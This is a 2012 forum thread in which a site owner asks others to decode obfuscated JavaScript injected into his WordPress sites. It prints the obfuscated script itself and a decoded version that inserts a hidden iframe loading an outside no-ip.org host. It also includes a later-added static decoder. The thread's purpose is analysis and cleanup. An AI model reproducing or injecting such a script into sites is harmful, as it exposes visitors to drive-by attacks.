WP Site Injected - Can Anyone Decipher Code for Me?

Discussion in 'BlackHat Lounge' started by nam6641, Feb 29, 2012.

  1. nam6641

    nam6641 Supreme Member

    Had Base64_Decode injected in some of my WordPress sites.

    Can anyone tell me what this is doing so I can try to track down who I need to f#ck up?

    Code:
    <script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.
5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;0>i-n.length;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}if(1)q=ss;if(f)e(q);</script>
     
  2. sockpuppet

    sockpuppet Junior Member

    This is going to be executed:
    Code:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://kid05784.no-ip.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://kid05784.no-ip.org/?go=2');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    
     
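The decoding step behind the answer above, as an added example that is not part of the original thread: a static decoder that reverses the script's `2*(1+x)` character mapping without calling `eval`, then reports the URL in defanged form. The function names are hypothetical; `EXCERPT` is a contiguous run of tokens copied from the injected script in the first post.

```javascript
// Added example: static decoder for the numeric obfuscation in the injected script.
// In that script h = -2*Math.log(Math.E) = -2, so each token x is turned into
// String.fromCharCode(-h*(1+1*x)), i.e. char code 2*(1+x). Nothing is eval()'d here.

function decodeTokens(encoded, sep = 'a', multiplier = 2) {
  const out = [];
  // Strip whitespace first: forum or e-mail wrapping can split a token ("29.\n5").
  for (const tok of encoded.replace(/\s+/g, '').split(sep)) {
    if (tok === '') continue; // tolerate leading/trailing separators
    const code = multiplier * (1 + Number(tok));
    if (!Number.isInteger(code) || code < 0 || code > 0xffff) {
      throw new RangeError(`token "${tok}" does not map to a character code`);
    }
    out.push(String.fromCharCode(code));
  }
  return out.join('');
}

// Defang a URL so it can go into tickets and blocklists without being clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Pull out what a responder needs from the decoded text (treated as data only).
function summarize(decoded) {
  const urls = [...new Set(decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
  return {
    urls: urls.map(defang),
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)|<iframe\b/i.test(decoded),
    hidesElement: /visibility\s*[:=]\s*['"]?hidden/i.test(decoded),
  };
}

// Token excerpt from the first post, re-wrapped across lines on purpose.
const EXCERPT = [
  '49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19',
  '18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19',
  '18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5',
  '51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a19.5a28.5',
  '50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5',
].join('a\n');

const decodedExcerpt = decodeTokens(EXCERPT);
console.log(decodedExcerpt);
console.log(summarize(decodedExcerpt));
```

Run it with Node.js; the whole token string from the `n="…"` assignment can be passed to `decodeTokens` the same way.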
  3. TrevorB

    TrevorB Jr. VIP Jr. VIP Premium Member

  4. nam6641

    nam6641 Supreme Member

    Some of my minisites from a year ago did not have the latest WP version installed, so I'm guessing there was a hole in a previous version that they exploited.
     
  5. white92

    white92 Regular Member

    Hi,

    Can you share your WP version?
     
  6. nam6641

    nam6641 Supreme Member

    Thanks for this. Of course it turns out to be a free hosting account, so they are looking into it and ideally will shut it down. Any idea what action is being executed by this?

     
  7. thsaint

    thsaint Newbie

    I have the same code on my WordPress sites. It keeps on popping up even if I delete it. How do I get rid of it?
     
  8. kvmcable

    kvmcable Supreme Member

    Looks like an iframe code. Shows a page in a page. Not working now because someone took down that link. So currently it's not showing what it was meant to show. Most likely an affiliate page or some joke, porn or signature page. Hard to say now that the URL is dead that was called in the frame.